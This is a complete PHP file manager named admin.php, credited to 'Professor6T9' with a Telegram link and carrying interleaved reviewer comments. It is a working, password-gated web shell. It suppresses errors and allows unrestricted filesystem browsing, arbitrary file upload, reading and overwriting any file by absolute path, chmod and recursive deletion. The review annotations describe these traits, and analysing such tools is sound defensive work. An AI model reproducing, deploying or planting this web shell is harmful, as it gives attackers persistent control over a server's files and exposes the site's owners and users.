Filename :
admin.php
<?php
// NOTE(review): single-file PHP file manager gated by a session flag.
// Traits visible in this listing that an analyst would record:
//   - all PHP error reporting is switched off;
//   - the password check compares against a hard-coded, unsalted MD5 chain;
//   - browse / upload / edit / rename / chmod / delete are driven directly by
//     request parameters, with no base-directory restriction and no CSRF token.
error_reporting(0);
session_start();

// --- Logout Handling ---
// Clears the session and redirects to the same URL with the query string removed.
if (isset($_GET['logout'])) {
    $_SESSION = [];
    session_destroy();
    header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
    exit;
}

// --- Login Handling ---
// Author's note on the literal: md5(md5(md5('password'))) (not verified here).
// NOTE(review): unsalted chained MD5 is a fast hash; there is also no attempt
// limiting or delay anywhere in this block.
$p = "89029e2d3f77b399fbbad3776f225b1f";
if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) {
    $_SESSION['logged_in'] = 1;
    header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
    exit;
}

// --- Gatekeeper: If not logged in, show login form and exit ---
// [MODIFIED] Uses the Tailwind CSS login page taken from the first script.
// The login markup references https://cdn.tailwindcss.com, so a browser that
// renders it makes a request to that host.
if (empty($_SESSION['logged_in'])) {
    echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>';
    exit;
}

// --- Below is all of the second script's original functional code, unchanged ---

// --- ROBUST PATH HANDLING (FINAL FIX) ---
$home = $_SERVER['HOME'] ?? '/';
$path = getcwd(); // Default to current directory
if (isset($_GET['path'])) {
    $temp_path = $_GET['path'];
    // Normalize path: backslashes become slashes, then "." and empty segments
    // are dropped and ".." pops the previous segment.
    // NOTE(review): this only canonicalises the string. Absolute paths are
    // accepted below, so the result is not confined to any base directory.
    $temp_path = str_replace('\\', '/', $temp_path);
    $parts = explode('/', $temp_path);
    $safe_parts = [];
    foreach ($parts as $part) {
        if ($part === '.' || $part === '') continue;
        if ($part === '..') {
            if (!empty($safe_parts)) {
                array_pop($safe_parts);
            }
        } else {
            $safe_parts[] = $part;
        }
    }
    // Determine if it's an absolute path (leading "/" or a "C:\"-style prefix)
    $is_absolute = (strpos($_GET['path'], '/') === 0 || preg_match('/^[a-zA-Z]:\\\\/', $_GET['path']));
    $prefix = $is_absolute ? '/' : '';
    $temp_path = $prefix . implode('/', $safe_parts);
    // Only an existing, readable directory replaces the default.
    if (is_dir($temp_path) && is_readable($temp_path)) {
        $path = $temp_path;
    }
}
$path = rtrim(str_replace('\\', '/', $path), '/');
if (empty($path)) $path = '/'; // rtrim() turned "/" into "", restore it

$uploadSuccess = false;
$uploadMessage = '';
$currentYear = date("Y");

/**
 * HTML-escape a value for output (htmlspecialchars with ENT_QUOTES).
 */
function h($str) {
    return htmlspecialchars($str, ENT_QUOTES);
}

/**
 * Recursively delete a directory and its contents.
 *
 * Returns silently when $dirPath is not a directory. The final rmdir() is
 * error-suppressed, so a failed removal is not reported.
 * NOTE(review): glob('*') does not match dot-prefixed entries by default, so a
 * directory holding hidden files would presumably be left in place - confirm.
 */
function delete_dir($dirPath) {
    if (!is_dir($dirPath)) return;
    if (substr($dirPath, -1) != '/') $dirPath .= '/';
    $files = glob($dirPath . '*', GLOB_MARK);
    foreach ($files as $file) {
        if (is_dir($file)) delete_dir($file);
        else unlink($file);
    }
    @rmdir($dirPath);
}

// Handle POST Actions
// NOTE(review): no CSRF token is checked on any of these state-changing actions.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $action = $_POST['action'] ?? '';
    if (isset($_FILES['upload'])) {
        // Multi-file upload into $path. Only the directory part of the client
        // filename is stripped (basename); no extension or content-type check
        // is made, and an existing file of the same name is overwritten.
        $total_files = count($_FILES['upload']['name']);
        $uploaded_count = 0;
        for ($i = 0; $i < $total_files; $i++) {
            if ($_FILES['upload']['error'][$i] == UPLOAD_ERR_OK) {
                $dest = $path . '/' . basename($_FILES['upload']['name'][$i]);
                if (move_uploaded_file($_FILES['upload']['tmp_name'][$i], $dest)) {
                    $uploaded_count++;
                }
            }
        }
        if ($uploaded_count > 0) {
            $uploadSuccess = true;
            $uploadMessage = "✅ {$uploaded_count} file(s) uploaded successfully!";
        }
    } elseif ($action === 'batch_delete' && !empty($_POST['selected_items'])) {
        // Each selected name is reduced to its basename and deleted inside $path.
        foreach ($_POST['selected_items'] as $item) {
            $target = $path . '/' . basename($item);
            if (file_exists($target)) {
                if (is_dir($target)) delete_dir($target);
                else unlink($target);
            }
        }
    } elseif ($action === 'chmod' && isset($_POST['file'], $_POST['perms'])) {
        // perms is parsed as an octal string; the chmod() result is not checked.
        chmod($path . '/' . basename($_POST['file']), intval($_POST['perms'], 8));
    } elseif ($action === 'save_edit' && isset($_POST['file_path'], $_POST['content'])) {
        // NOTE(review): file_path is used verbatim (no basename, no $path
        // prefix), unlike the sibling actions, and the write result is ignored.
        file_put_contents($_POST['file_path'], $_POST['content']);
        header("Location: ?path=" . urlencode(dirname($_POST['file_path'])));
        exit;
    } elseif ($action === 'rename' && isset($_POST['old_name'], $_POST['new_name'])) {
        // Both names are reduced to basenames, so a rename stays inside $path.
        rename($path . '/' . basename($_POST['old_name']), $path . '/' . basename($_POST['new_name']));
    }
    // Every POST other than save_edit ends with a redirect back to the listing.
    if ($action !== 'save_edit') {
        header("Location: ?path=" . urlencode($path));
        exit;
    }
}

// Handle GET Actions
if (isset($_GET['action'])) {
    $action = $_GET['action'];
    if ($action === 'get_content' && isset($_GET['file'])) {
        // Returns the HTML-escaped content of the file named by the "file"
        // parameter. NOTE(review): the parameter is used verbatim, with no
        // restriction to $path.
        $file_path = $_GET['file'];
        if (is_file($file_path) && is_readable($file_path)) {
            echo h(file_get_contents($file_path));
        } else {
            echo "Error: Cannot read file.";
        }
        exit;
    }
    if ($action === 'delete' && isset($_GET['item'])) {
        // NOTE(review): a destructive action reachable with a plain GET request.
        $target = $path . '/' . basename($_GET['item']);
        if (file_exists($target)) {
            if (is_dir($target)) delete_dir($target);
            else unlink($target);
        }
        header("Location: ?path=" . urlencode($path));
        exit;
    }
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>📁</title>
<style>
body { background: #111; color: #eee; font-family: monospace; padding: 20px; }
a { color: #6cf; text-decoration: none; }
a:hover { text-decoration: underline; }
table { width: 100%; border-collapse: collapse; margin-top: 15px; background: #1c1c1c; }
th, td { padding: 8px; border: 1px solid #333; text-align: left; word-break: break-all; }
th { background: #2a2a2a; }
input, button, textarea { background: #222; color: #eee; border: 1px solid #444; padding: 5px; border-radius: 4px; font-family: monospace; }
button { background: #6cf; color: #000; font-weight: bold; cursor: pointer; }
button.danger { background: #f66; color: #fff; }
.breadcrumb a { color: #ccc; margin-right: 5px; }
.breadcrumb span { color: #888; margin: 0 4px; }
.card { background: #1c1c1c; padding: 15px; border-radius: 8px; box-shadow: 0 0 10px #000; margin-top: 20px; }
footer { text-align: center; margin-top: 40px; color: #666; font-size: 0.9em; }
.modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.7); }
.modal-content { background-color: #1c1c1c; margin: 5% auto; padding: 20px; border: 1px solid #444; width: 80%; max-width: 800px; border-radius: 8px; display: flex; flex-direction: column; height: 80vh; }
.modal-header { padding-bottom: 10px; border-bottom: 1px solid #333; }
.modal-body { flex-grow: 1; margin: 10px 0; display: flex; flex-direction: column; }
.modal-body textarea { width: 100%; flex-grow: 1; resize: none; }
.modal-footer { padding-top: 10px; border-top: 1px solid #333; text-align: right; }
.close { color: #aaa; float: right; font-size: 28px; font-weight: bold; }
.close:hover, .close:focus { color: #fff; text-decoration: none; cursor: pointer; }
</style>
<?php
// NOTE(review): the upload form below posts no "action" field, so an upload made
// through it takes the redirect-and-exit path in the POST handler and this alert
// is not rendered.
if ($uploadSuccess): ?>
<script>alert("<?= $uploadMessage ?>");</script>
<?php endif; ?>
</head>
<body>
<div style="display: flex; justify-content: space-between; align-items: center;">
<h2>📁 File Manager By Professor6T9</h2>
<a href="?logout=1" style="color: #f66; font-size: 0.9em;">Logout</a>
</div>
<form method="get">
<label>📂 Change Directory:</label>
<input type="text" name="path" value="<?= h($path) ?>" style="width:60%;">
<button type="submit">Go</button>
</form>
<div class="breadcrumb">
<?php
// Breadcrumb: one link per path segment, each pointing at the accumulated prefix,
// followed by a link to $home.
$crumbs = explode('/', trim($path, '/'));
$accum = '';
echo '<a href="?path=/">/</a>';
if ($path !== '/') {
    foreach ($crumbs as $crumb) {
        if (empty($crumb)) continue;
        $accum .= '/' . $crumb;
        echo '<span>/</span><a href="?path=' . urlencode($accum) . '">' . h($crumb) . '</a>';
    }
}
echo '<span>/</span><a href="?path=' . urlencode($home) . '">[ HOME ]</a>';
?>
</div>
<?php
// dirname() returns the path itself at the filesystem root, which hides the link.
$parent_path = dirname($path);
if ($parent_path !== $path): ?>
<p><a href="?path=<?= urlencode($parent_path) ?>">⬅️ [ PARENT DIR ]</a></p>
<?php endif; ?>
<div class="card">
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload[]" required multiple>
<button type="submit">📤 Upload</button>
</form>
</div>
<form method="post" id="file-list-form">
<input type="hidden" name="action" value="batch_delete">
<div class="card">
<div style="margin-bottom: 10px;">
<button type="submit" class="danger" onclick="return confirm('Are you sure you want to delete all selected items?');">🗑️ Delete Selected</button>
</div>
<table>
<thead>
<tr>
<th><input type="checkbox" id="select-all-checkbox"></th>
<th>Name</th><th>Size (kB)</th><th>Modified</th><th>Perms</th><th>Actions</th>
</tr>
</thead>
<tbody>
<?php
// Directory listing: directories first, then files, in scandir() order.
$items = @scandir($path);
if ($items === false) {
    echo '<tr><td colspan="6" style="color: #f66;">Error: Cannot read directory. Check permissions.</td></tr>';
} else {
    $dirs = $files = [];
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        if (@is_dir($path . '/' . $item)) $dirs[] = $item;
        else $files[] = $item;
    }
    $all = array_merge($dirs, $files);
    foreach ($all as $item) {
        // Avoid a double slash when listing the filesystem root.
        $full = ($path === '/' ? '' : $path) . '/' . $item;
        $isDir = is_dir($full);
        // Last four octal digits of the mode, e.g. "0644".
        $perm = substr(sprintf('%o', @fileperms($full)), -4);
        $mtime = @filemtime($full);
        $size = $isDir ? '-' : round(@filesize($full) / 1024, 2);
        $date = $mtime ? date("Y-m-d H:i:s", $mtime) : '-';
        echo '<tr>';
        echo '<td><input type="checkbox" class="item-checkbox" name="selected_items[]" value="' . h($item) . '"></td>';
        echo '<td>';
        echo $isDir ? '<a href="?path=' . urlencode($full) . '">📁 ' . h($item) . '</a>' : '📄 ' . h($item);
        echo '</td>';
        echo "<td>$size</td><td>$date</td>";
        // NOTE(review): in the inline onclick handlers below the name is only
        // HTML-escaped by h(); a value placed inside a JavaScript string literal
        // also needs JS-string encoding (e.g. json_encode) before HTML escaping.
        echo '<td> <input type="text" id="perms-input-' . h($item) . '" value="' . $perm . '" size="4" style="text-align:center;"> <button type="button" onclick="setChmod(\'' . h($item) . '\')">Set</button> </td>';
        echo '<td>';
        echo '<a href="javascript:void(0)" onclick="openRenameModal(\'' . h($item) . '\')">✏️ Rename</a> | ';
        echo '<a href="?action=delete&path=' . urlencode($path) . '&item=' . urlencode($item) . '" onclick="return confirm(\'Delete this item?\')">🗑️</a>';
        if (!$isDir) {
            echo ' | <a href="javascript:void(0)" onclick="openEditModal(\'' . h($full) . '\')">📝 Edit</a>';
            // The download href is the bare file name, i.e. relative to this
            // script's URL rather than to $path.
            echo ' | <a href="' . h($item) . '" download>⬇️ Download</a>';
        }
        echo '</td></tr>';
    }
}
?>
</tbody>
</table>
</div>
</form>
<footer>© <?= $currentYear ?> | File Manager by <a href="http://t.me/Professor6T9" target="_blank">@Professor6T9</a></footer>
<!-- Hidden form for chmod to avoid nesting -->
<form method="POST" id="chmod-form" style="display:none;">
<input type="hidden" name="action" value="chmod">
<input type="hidden" id="chmod_file_hidden" name="file">
<input type="hidden" id="chmod_perms_hidden" name="perms">
</form>
<!-- Modals -->
<div id="editModal" class="modal">
<div class="modal-content">
<div class="modal-header">
<span class="close" onclick="closeModal('editModal')">×</span>
<h3>Edit File</h3>
</div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" id="edit_file_path" name="file_path">
<textarea id="edit_content" name="content"></textarea>
<div class="modal-footer">
<button type="submit">💾 Save</button>
</div>
</form>
</div>
</div>
<div id="renameModal" class="modal">
<div class="modal-content" style="height: auto;">
<div class="modal-header"><span class="close" onclick="closeModal('renameModal')">×</span><h3>Rename Item</h3></div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="rename">
<input type="hidden" id="rename_old_name" name="old_name">
<label>New Name:</label>
<input type="text" id="rename_new_name" name="new_name" style="width: 100%;">
<div class="modal-footer"><button type="submit">✏️ Rename</button></div>
</form>
</div>
</div>
<script>
// Hide the modal with the given element id.
function closeModal(id) {
    document.getElementById(id).style.display = 'none';
}

// Open the edit modal for filePath and load the file through ?action=get_content.
// NOTE(review): the server HTML-escapes that response and it is assigned to
// textarea.value as plain text, so entities such as &lt; appear literally in the
// editor and would be written back as such on save.
function openEditModal(filePath) {
    const modal = document.getElementById('editModal');
    const contentArea = document.getElementById('edit_content');
    document.getElementById('edit_file_path').value = filePath;
    contentArea.value = 'Loading content...';
    modal.style.display = 'block';
    fetch(`?action=get_content&file=${encodeURIComponent(filePath)}`)
        .then(response => response.text())
        .then(data => { contentArea.value = data; })
        .catch(error => { contentArea.value = 'Error loading file content: ' + error; });
}

// Open the rename modal with both the hidden old name and the editable new name
// pre-filled with oldName.
function openRenameModal(oldName) {
    document.getElementById('rename_old_name').value = oldName;
    document.getElementById('rename_new_name').value = oldName;
    document.getElementById('renameModal').style.display = 'block';
    document.getElementById('rename_new_name').focus();
}

// Copy the row's permission field into the hidden chmod form and submit it.
function setChmod(fileName) {
    const permsValue = document.getElementById('perms-input-' + fileName).value;
    document.getElementById('chmod_file_hidden').value = fileName;
    document.getElementById('chmod_perms_hidden').value = permsValue;
    document.getElementById('chmod-form').submit();
}

document.addEventListener('DOMContentLoaded', function() {
    // "Select all" mirrors its checked state onto every row checkbox.
    const selectAllCheckbox = document.getElementById('select-all-checkbox');
    if (selectAllCheckbox) {
        selectAllCheckbox.addEventListener('change', function() {
            const itemCheckboxes = document.querySelectorAll('.item-checkbox');
            itemCheckboxes.forEach(checkbox => { checkbox.checked = this.checked; });
        });
    }
    // A click on the modal backdrop (the .modal element itself) closes it.
    window.onclick = function(event) {
        if (event.target.classList.contains('modal')) {
            event.target.style.display = "none";
        }
    }
});
</script>
</body>
</html>